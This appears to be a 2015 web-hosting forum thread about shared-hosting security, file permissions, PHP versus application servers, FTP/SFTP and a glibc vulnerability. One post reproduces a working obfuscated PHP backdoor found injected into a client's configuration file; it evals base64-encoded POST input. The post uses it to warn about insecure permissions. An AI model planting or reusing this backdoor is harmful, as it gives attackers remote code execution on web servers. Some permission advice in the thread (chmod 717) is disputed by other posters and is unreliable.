|
You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far.
|
# ? Jan 17, 2015 01:05 |
|
|
Just spun up a VM on Vultr; it's way, way faster than my DigitalOcean node, even taking into account 512MB vs 768MB
|
# ? Jan 18, 2015 16:43 |
|
Skywalker OG posted:You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far. Just to give you an idea of the sophistication now, this is a client's configuration file, modified by a hacker, that I came across today via feedback loop: php:<?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10]. $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1]. $sF[7].$sF[8].$sF[10]); $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); if (isset(${$s20}['n88b749'])) { eval($s21(${$s20}['n88b749']));}?><?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for ma Typically it's one line, but I had to break it into a few lines to make it play nice with the forums. The only reason this happened is that the file's permissions allowed the web server user to modify it (the client got lazy and applied 777 to all files). If the file had permissions 755, and a different owner than the user the web server runs as, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user that owns the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this one), there's no guarantee your frontend software is safe. nem fucked around with this message at 09:51 on Jan 19, 2015 |
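The ownership-and-mode fix nem describes looks roughly like this (a sketch; "alice", "www-data", and the paths are hypothetical, and chown needs root):

```shell
# Keep files owned by the account user, not the web server user, so PHP
# running as www-data can read the config but never rewrite it.
chown alice:alice /home/alice/public_html/configuration.php
chmod 644 /home/alice/public_html/configuration.php  # owner rw, everyone else read-only

# Directories at 755 so the web server can traverse, but not create files.
find /home/alice/public_html -type d -exec chmod 755 {} +
```

With that in place, the injected-eval attack above degrades from "config silently backdoored" to "write attempt fails with EACCES".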
# ? Jan 19, 2015 01:23 |
|
That garbage is why I will always maintain that CGI-based applications are terrible and need to go away. Yes, that means PHP in its entirety needs to go away. CGI is fundamentally flawed in this context. It should never be possible to execute a goddamn image, or an arbitrary user-uploaded file. It's meant for quick and dirty scripts to be executable in a web directory, not for building entire applications. People should really start using real toolkits and running actual application servers instead of trying to shoehorn big applications into CGI. There are simply too many potential entry points to code execution with the CGI model, and nearly every case of someone's site getting owned can be traced back to some script that shouldn't have been executed directly, but was, because CGI: execute all the things!
|
# ? Jan 19, 2015 01:46 |
|
Sooooooo, CGI is the problem instead of 0777 permissions? Proper file ownership and permissions go a long, long way towards making even the most stupid vulnerability in anything less likely to exploit the entire machine instead of just the one account. So many hosts get this wrong that creators of scripts designed for shared hosting often have to actively recommend insecure permissions just to work around file ownership stupidity. It's a self perpetuating problem, no matter what language the offending scripts are written in, no matter how they interface with the rest of the system, CGI, WSGI, PSGI, FastCGI, whatever bullshit Java does, whatever.
|
# ? Jan 20, 2015 08:23 |
|
Modern webapps don't even usually have public "files"; you configure two virtual hosts, one for static content in an /uploads directory that doesn't execute any form of scripting, while every other request pipes into the /index.php bootstrapper
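That two-vhost split might be sketched in nginx like this (hostnames, paths, and the PHP-FPM socket are all hypothetical):

```nginx
# Vhost 1: uploads served as inert static bytes; no PHP handler exists here.
server {
    listen 80;
    server_name static.example.com;
    root /var/www/uploads;
}

# Vhost 2: the application; every request funnels through one bootstrapper.
server {
    listen 80;
    server_name example.com;
    root /var/www/app/public;

    location / {
        try_files $uri /index.php?$args;
    }

    location = /index.php {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root/index.php;
        fastcgi_pass unix:/run/php-fpm.sock;
    }
}
```

Since only the literal /index.php path ever reaches the script handler, a PHP file dropped into /uploads is just downloaded, never executed.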
|
# ? Jan 20, 2015 11:49 |
|
McGlockenshire posted:Sooooooo, CGI is the problem instead of 0777 permissions? No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM, whatever wrapper you're using that switches users to process a request, is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777; only the damage scope changes (all of your files vs all of someone else's). 777 is bad because members of your group can run amok and modify any of your files. 717 works if the web server is the only user outside your group (falling into the "other" class), because there are no other members of that class who can touch your assets. Sometimes 717 doesn't work, because it's a mixed environment with other users. In those cases, you should run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write or modify.
It's not perfect, but it's pretty close to being so.
|
# ? Jan 20, 2015 16:12 |
|
nem posted:No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's). Alternatively, people can stop being scared of it and write proper contexts for SELinux, and take care of an awful lot of issues right there.
|
# ? Jan 20, 2015 16:34 |
|
McGlockenshire posted:Sooooooo, CGI is the problem instead of 0777 permissions? Proper filesystem permissions are absolutely important. However, avoiding a system in which your stack will execute arbitrary scripts that get uploaded, instead executing an application server with a single known entry point which speaks HTTP or another protocol designed for this purpose, eliminates a *lot* of problems. You can attain similar stuff with .htaccess hackery, but you shouldn't even have to do that. When your application is an actual program running on the server that speaks to your web server directly, you're not going to have the web server executing some arbitrary script that some kid just managed to get written out in your web root, because the web server is configured in such a way that CGI-style execution is completely disabled. Uploaded files simply cannot get executed, because you're not passing any old script that matches a certain file extension to a script handler. Now someone would have to somehow write out code into the application itself (which is forbidden by your proper FS permissions), but beyond that, do so in such a way that the application would actually load it. Real application servers don't compile code for every request, so it wouldn't get loaded until the application server restarts - and when using a proper deploy process, you're completely trashing your old web directory and loading a fresh copy every time you deploy, so that code would get blown out at the next deploy and very likely never loaded since you only restart the app server under three conditions: deploys (frequent), reboots (rare), and crashes (rare). The mere idea of compiling your entire application for every request boggles my mind. Why would anyone ever think that's a good idea? 
That compile-for-every-request lifecycle led to this crazy ecosystem of opcode caches to try to alleviate the pain of compiling your site for every request, and those opcode caches have a tendency to get corrupted or otherwise break functionality. Why not just use a sane language and architecture to begin with? Thalagyrt fucked around with this message at 17:24 on Jan 20, 2015 |
# ? Jan 20, 2015 17:16 |
|
tl;dr, php sucks, use anything else http://www.thalagyrtlovesphp.com/
|
# ? Jan 20, 2015 17:32 |
|
DarkLotus posted:tl;dr, php sucks, use anything else
|
# ? Jan 20, 2015 17:33 |
|
DarkLotus posted:tl;dr, php sucks, use anything else Hello Dear, I am wanting to make Site like Facebook using the PHP. I am offer 15$ You can make the Codes? It will success For sure.
|
# ? Jan 20, 2015 18:19 |
|
Croc Monster posted:
Hi yes $25 and I guarantee you get all Codes in 4 hours. Please to be paying with the PayPal. I will kindly await you to revert back ASAP. Thalagyrt fucked around with this message at 18:29 on Jan 20, 2015 |
# ? Jan 20, 2015 18:25 |
|
Croc Monster posted:
Excellent response, thank you for making my day
|
# ? Jan 20, 2015 18:28 |
|
nem posted:777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets. On a multi-user system, you probably don't want to make something world-writeable if you're already concerned about it being group-writeable.
|
# ? Jan 26, 2015 23:41 |
|
DarkLotus posted:On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable. Depends upon setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, then 717 works. 1 would be applied to group, 7 to others not matched in the group per discretionary access control implementation. It's a dumbed-down version; ACLs or SELinux are better, albeit more intense, options. Once you have another user outside that group with the same filesystem visibility, then 717 fails. It requires a combination of jailing and application access restrictions to properly implement. \/ - ACLs (setfacl command) and SELinux. Setup works great on a VPS. Not so much for massive hosting companies without the tweaks as noted above. nem fucked around with this message at 01:50 on Jan 27, 2015 |
# ? Jan 27, 2015 00:38 |
|
That's one hell of a specific, fragile scenario you've just invented and I think people itt would be best advised not to chmod anything to 717 ever because there is almost certainly a better solution
|
# ? Jan 27, 2015 01:25 |
|
Rufus Ping posted:That's one hell of a specific, fragile scenario you've just invented and I think people itt would be best advised not to chmod anything to 717 ever because there is almost certainly a better solution Yeah, this exactly. That's far too prone to screwups for me to ever consider doing. Use ACLs instead.
|
# ? Jan 27, 2015 01:55 |
|
nem posted:For example, when setting up WordPress the best things you can do from a security standpoint are: I've not used WordPress in quite some time, but I remember having to set up SFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and aren't utilizing SFTP, what's the point? Unless I'm missing something, in which case eightysixed derps all day every day.
|
# ? Jan 27, 2015 02:38 |
|
eightysixed posted:I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day. Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server, and traffic will pass out onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't leave the server unless the server is compromised and a privileged user is capturing local traffic; if so, you've got bigger issues on your hands, like a possible rooting. The FTP password in that case passes over a TCP socket connected locally on the server, bypassing the switch. SFTP requires ssh as a wrapper, so there's a dependency upon the host to support ssh on the account. I hope that in time WordPress will integrate Auth TLS support into its built-in FTP client; that would solve the issue of encrypting the endpoint without relying on ssh. If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way, not only is your admin password encrypted, but so are your FTP credentials. Using FTP and running a separate web server creates a permission partition between what you can access and what the web server can. It's the same reason we have UAC in Windows edit: nuances nem fucked around with this message at 19:54 on Jan 27, 2015 |
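For what it's worth, the localhost arrangement nem describes is set in wp-config.php via WordPress's documented filesystem constants (the credential values here are placeholders):

```php
// Use WordPress's FTP filesystem method, pointed at an FTP daemon on the same
// box, so credentials only ever cross a local socket. Values are placeholders.
define('FS_METHOD', 'ftpext');
define('FTP_HOST',  'localhost');
define('FTP_USER',  'alice');
define('FTP_PASS',  'change-me');
```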
# ? Jan 27, 2015 05:24 |
|
nem posted:Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is stuck in promiscuous mode and, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper around the FTP protocol, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh. SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript.
|
# ? Jan 27, 2015 18:03 |
|
also what you said about promiscuous mode is wrong, promisc is just like an inbound mac address filter and has nothing to do with traffic 'escaping'
|
# ? Jan 27, 2015 18:28 |
|
/\ - True, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges. Thalagyrt posted:SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript. It ships with OpenSSH and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate the two, but going back again to contrived scenarios, I don't think most providers will jump through the hoops to separate ssh and sftp-server. 90% of those layouts will use the stock sshd_config.
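On stock OpenSSH installs that layout is a single Subsystem line in sshd_config (the binary path varies by distro):

```
# /etc/ssh/sshd_config: SFTP rides inside sshd as a subsystem
Subsystem sftp /usr/libexec/openssh/sftp-server
# or, with no external helper binary at all:
# Subsystem sftp internal-sftp
```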
nem fucked around with this message at 18:55 on Jan 27, 2015 |
# ? Jan 27, 2015 18:39 |
|
nem posted:/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges. I was specifically addressing this: quote:SFTP requires ssh as a wrapper around the FTP protocol which is absolutely incorrect. sftp-server is not in any way shape or form an implementation of the FTP protocol. SFTP and FTP are like Java and JavaScript - similar in name only.
|
# ? Jan 27, 2015 19:18 |
|
Thalagyrt posted:I was specifically addressing this: need coffee
|
# ? Jan 27, 2015 19:23 |
|
Rufus Ping posted:also what you said about promiscuous mode is wrong, promisc is just like an inbound mac address filter and has nothing to do with traffic 'escaping' To add onto this, promiscuous mode also doesn't guarantee that the switch will send all traffic that passes through it to your port. It's really most useful if you're hooked up to a hub (which you're probably not) or if the switch has been configured to mirror all traffic that passes through it to your port, which is most commonly done for IDS type devices or when you're trying to diagnose a connectivity issue. It definitely doesn't under any circumstances mean "the host is going to send all traffic destined for the local machine out over all ethernet devices". The kernel's network routing simply doesn't work that way. If traffic is destined for an IP address that's bound to a local interface it takes a short circuit path through the network stack and bypasses layer 2 entirely. Thalagyrt fucked around with this message at 19:49 on Jan 27, 2015 |
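The short-circuit Thalagyrt describes is visible from the routing table itself; asking the kernel how it would reach a locally bound address shows the loopback path (assumes Linux with iproute2):

```shell
# Traffic to a locally bound IP resolves via the "local" routing table and the
# loopback device; it never reaches a physical NIC, promiscuous or otherwise.
ip route get 127.0.0.1
# typically prints something like: local 127.0.0.1 dev lo src 127.0.0.1 ...
```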
# ? Jan 27, 2015 19:46 |
|
nem posted:/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges. you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting
|
# ? Jan 27, 2015 19:48 |
|
Being promiscuous makes you more likely to get viruses.
|
# ? Jan 27, 2015 19:50 |
|
Rufus Ping posted:you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting Yes, raw traffic capability is a broader, and more suggestive term. Original post has been amended.
|
# ? Jan 27, 2015 19:53 |
|
Big CVE today affecting glibc versions from before May 2013 (fixed upstream in the 2.18 era). It wasn't marked as a security patch back then, so it didn't get backported. Ubuntu <= 13.04 is impacted, and patches exist for 10.04 and 12.04 LTS. Debian 7 is also impacted, and patches are mainlined. Patches are out for RHEL 5 and 6. RHEL 7 is not impacted. CentOS has not yet released patches, and it's safe to say their downstreams haven't either. The bug is remote code execution in gethostbyname(), so this is an exploit that could potentially allow an attacker to gain remote code execution by sending you a malicious email, as one example. This patch requires a reboot to ensure that all processes linking glibc get updated. Since init links glibc, you need to restart init, which means a reboot. I'll post again once CentOS updates have been released.
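If you want to check a box by hand, the version string is a quick first pass (hedged: distros backport fixes without bumping the version, so the package changelog is the authoritative check):

```shell
# First pass: report the runtime glibc version. Upstream fixed this in the
# 2.18 era; distro builds may carry the fix as a backport instead.
ldd --version | head -n1

# On RPM-based systems the changelog is authoritative (commented out here
# since it is RPM-specific):
# rpm -q --changelog glibc | grep -i CVE-2015-0235
```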
|
# ? Jan 27, 2015 22:35 |
|
14.04 LTS 4lyfe For once I don't have to do anything.
|
# ? Jan 28, 2015 01:10 |
|
What the hell is up with Bounceweb? My wife's website has slowed to a crawl; it's a rather light little WP page for her business. Takes about 15 seconds to load, and even the dashboard is slow. I've disabled plugins to see if that was the issue; nope. I didn't know there was an issue until Google AdWords stopped our advertising three months ago because the site was too slow. Bounceweb keeps telling me that nothing is wrong, but I suspect their CPUs are overloaded pieces of poo poo. I also see it is no longer on the goon list. Awesome.
|
# ? Jan 29, 2015 05:42 |
|
from what i remember it's always been a lovely "UNLIMITED EVERYTHING PREPAY 10 YEAR DISCOUNT PRICES SHOWN" thing with a user that just registered to post it and not much else
|
# ? Jan 29, 2015 05:56 |
|
Biowarfare posted:from what i remember it's always been a lovely "UNLIMITED EVERYTHING PREPAY 10 YEAR DISCOUNT PRICES SHOWN" thing with a user that just registered to post it and not much else guess I'll move it. The bitch is the domain is through them, and I hate dealing with domain transfers.
|
# ? Jan 29, 2015 06:05 |
|
Aeka 2.0 posted:guess I'll move it. The bitch is the domain is through them, and I hate dealing with domain transfers. Good luck, BounceWeb does not respond to requests for EPP codes unless something has changed in the last several months... I've helped plenty of goons get out of there. Not all of them came to Lithium, but I felt like someone needed to help people get away from Bounceweb. If you have troubles, shoot me a PM and I'll try and work some magic with enom.
|
# ? Jan 29, 2015 06:14 |
|
DarkLotus posted:Good luck, BounceWeb does not respond to requests for EPP codes unless something has changed in the last several months... sending PM.
|
# ? Jan 29, 2015 06:37 |
|
Just in case it hasn't been mentioned in the last few pages: PUBLIC SERVICE ANNOUNCEMENT: STAY AWAY FROM BOUNCEWEB!
|
# ? Jan 29, 2015 15:31 |
|
So I've never worked with anything approaching professional webhosting, but the company I work for needs to start a consumer-facing website that will be WordPress based with an ecommerce and user management package. We're going to be working with some consultants to get the website designed and built; they recommended one company for webhosting, and I feel like it's a total rip-off for what is offered, but I'm not an expert in these things. I've compared it to fully dedicated hosting options with HostGator, Arvixe, InMotion, and Dreamhost, and their option (which is through a company called Trioptek) is about 30% higher than the next lowest. Here's their quote for hosting through Trioptek quote:Tier 1 Dedicated Virtual Server Environment So am I right in feeling like we're being set up to get fleeced here? e: I'm going to reach out to RackSpace since they're recommended in the OP and get a quote. SpartanIvy fucked around with this message at 16:49 on Jan 29, 2015 |
# ? Jan 29, 2015 16:45 |
|
for that price i'd expect Rackspace.. it's not bad, but it's not good, assuming truly proactive 24/7 SLA'd support and full management. 10Mbps can be completely exhausted by a single home connection..
|
# ? Jan 29, 2015 16:51 |
|
|
SpartanIV posted:Here's their quote for hosting through Trioptek bahahaha How many users are you planning on having at one time? We ran 10 interactive Ruby on Rails apps with 25,000 users a day on a system like that. You could handle wordpress and ecommerce on a 1 or 2 gb linode. How many orders a day? How many visitors?
|
# ? Jan 29, 2015 17:09 |